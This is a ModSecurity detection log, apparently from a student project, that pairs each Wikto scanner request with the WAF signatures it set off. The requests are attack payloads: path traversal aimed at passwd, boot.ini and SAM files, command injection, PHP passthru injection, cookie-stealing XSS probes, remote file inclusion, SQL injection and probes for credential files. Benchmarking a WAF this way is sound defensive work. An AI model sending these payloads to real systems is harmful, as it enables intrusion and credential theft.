# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l wikto.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_dinamica/security_tools_benchmarking/wikto/wikto.clean
Packet [32]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [33]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [46]	Uri [/.DS_Store]	Nattacks [1 ]	Signatures	[930130]
Packet [47]	Uri [/.DS_Store]	Nattacks [1 ]	Signatures	[930130]
Packet [65]	Uri [/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [71]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [72]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [164]	Uri [/oem_webstage/oem.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [165]	Uri [/php/php.exe?c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [210]	Uri [/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [222]	Uri [../../../../../../../../../../etc/*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [223]	Uri [../../../../../../../../../../etc/passw*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [224]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [225]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [226]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [227]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [230]	Uri [@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [231]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [232]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [243]	Uri [/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [247]	Uri [/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [248]	Uri [/../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [249]	Uri [/../config.dat]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [250]	Uri [/../webserver.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [251]	Uri [//..\SensePostNotThereNoNolass]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [252]	Uri [/..\..\..\..\..\..\temp\temp.class]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [253]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [254]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [255]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [256]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [257]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [258]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [259]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [260]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [261]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [262]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [263]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [264]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [265]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [266]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [267]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [268]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [269]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [270]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [272]	Uri [/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [275]	Uri [//.adSensePostNotThereNoNobook]	Nattacks [1 ]	Signatures	[913120]
Packet [278]	Uri [/.bash_history]	Nattacks [1 ]	Signatures	[930130]
Packet [280]	Uri [/.bashrc]	Nattacks [1 ]	Signatures	[930130]
Packet [281]	Uri [/.cobalt/sysManage/../admin/.htaccess]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930130]
Packet [282]	Uri [/.cobalt/sysManage/../admin/.htaccess]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930130]
Packet [289]	Uri [/.htaccess]	Nattacks [1 ]	Signatures	[930130]
Packet [291]	Uri [/.htpasswd]	Nattacks [1 ]	Signatures	[930130]
Packet [296]	Uri [/.mysql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [309]	Uri [/.profile]	Nattacks [1 ]	Signatures	[930130]
Packet [313]	Uri [/.sh_history]	Nattacks [1 ]	Signatures	[930130]
Packet [317]	Uri [/.ssh/authorized_keys]	Nattacks [1 ]	Signatures	[930130]
Packet [319]	Uri [/.ssh/known_hosts]	Nattacks [1 ]	Signatures	[930130]
Packet [323]	Uri [/[SecCheck]/..%252f..%252f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [324]	Uri [/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [325]	Uri [/[SecCheck]/..%255c..%255c../extSensePostNotThereNoNo.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [326]	Uri [/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [327]	Uri [/[SecCheck]/..%2f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [328]	Uri [/[SecCheck]/..%2f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [329]	Uri [////./../.../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [337]	Uri [/%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [338]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [339]	Uri [/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [340]	Uri [/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [352]	Uri [/acart2_0/acaSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [353]	Uri [/acart2_0/acart2_0.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [358]	Uri [/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/]	Nattacks [1 ]	Signatures	[931130]
Packet [359]	Uri [/active.log]	Nattacks [1 ]	Signatures	[920440]
Packet [362]	Uri [/Admin_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [363]	Uri [/Admin_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [381]	Uri [/admin/cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [382]	Uri [/admin/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [383]	Uri [/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [384]	Uri [/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [388]	Uri [/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [396]	Uri [/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [408]	Uri [/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [414]	Uri [/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [415]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [421]	Uri [/ASP/cart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [422]	Uri [/ASP/cart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [423]	Uri [/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [424]	Uri [/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [427]	Uri [/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [428]	Uri [/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [437]	Uri [//banSensePostNotThereNoNo.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [438]	Uri [/ban.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [439]	Uri [//banSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [440]	Uri [/ban.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [441]	Uri [//banSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [442]	Uri [/ban.log]	Nattacks [1 ]	Signatures	[920440]
Packet [443]	Uri [//banSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [444]	Uri [/banmat.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [445]	Uri [/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*]	Nattacks [5 ]	Signatures	[920220]	[920272]	[942260]	[942440]	[942460]
Packet [446]	Uri [/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [447]	Uri [/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [473]	Uri [/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [476]	Uri [/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [477]	Uri [/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [478]	Uri [/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [479]	Uri [/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [483]	Uri [/catalog/includes/include_once.php]	Nattacks [1 ]	Signatures	[933150]
Packet [485]	Uri [/catinfo?<u><b>TESTING]	Nattacks [2 ]	Signatures	[941320]	[942130]
Packet [508]	Uri [/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [509]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [513]	Uri [/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [527]	Uri [/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [543]	Uri [/cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download]	Nattacks [1 ]	Signatures	[920272]
Packet [558]	Uri [/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [609]	Uri [//conSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [610]	Uri [/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [623]	Uri [//cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [624]	Uri [/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [625]	Uri [/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [626]	Uri [/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [627]	Uri [/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [633]	Uri [//datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [634]	Uri [/data.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [641]	Uri [/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [642]	Uri [/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [645]	Uri [/databse.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [646]	Uri [//db.SensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [647]	Uri [/db.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [648]	Uri [/db/useSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [649]	Uri [/db/users.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [656]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [662]	Uri [/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [663]	Uri [/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [666]	Uri [/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [667]	Uri [/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [673]	Uri [/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [674]	Uri [/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [680]	Uri [/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [681]	Uri [/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/]	Nattacks [2 ]	Signatures	[931110]	[931130]
Packet [692]	Uri [//extSensePostNotThereNoNo.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [693]	Uri [/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [695]	Uri [/ext.ini.%00.txt]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [696]	Uri [/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [705]	Uri [/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [706]	Uri [/forum/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [707]	Uri [/forum/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [708]	Uri [/forum/admin/wwfSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [709]	Uri [/forum/admin/wwforum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [711]	Uri [/forumdisplay.php?GLOBALS[]=1&f=2&comma=\.system('id').\]	Nattacks [3 ]	Signatures	[933160]	[942460]	[942511]
Packet [714]	Uri [/forums/indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [715]	Uri [/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [716]	Uri [/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [717]	Uri [/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [718]	Uri [/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [719]	Uri [/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [727]	Uri [//gloSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [728]	Uri [/global.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [731]	Uri [/guestbook/SensePostNotThereNoNo?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [732]	Uri [/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [735]	Uri [/guestbook/admin/o12SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [736]	Uri [/guestbook/admin/o12guest.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [757]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [758]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [763]	Uri [/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [775]	Uri [/images/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [790]	Uri [/inc/sendmail.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [791]	Uri [/index.html.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [792]	Uri [/index.html~]	Nattacks [1 ]	Signatures	[920500]
Packet [793]	Uri [/index.html~]	Nattacks [1 ]	Signatures	[920500]
Packet [804]	Uri [/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [805]	Uri [/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [806]	Uri [/index.php?download=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [810]	Uri [/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [811]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [812]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [815]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [816]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [817]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [818]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [819]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [820]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [821]	Uri [/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [822]	Uri [/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [824]	Uri [//indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [825]	Uri [/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [833]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [834]	Uri [/internal.sws?../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [835]	Uri [/interscan/cgi-bin/FtpSave.dll?I'm%20Here]	Nattacks [1 ]	Signatures	[920440]
Packet [856]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [857]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [858]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [859]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [860]	Uri [/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [865]	Uri [/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
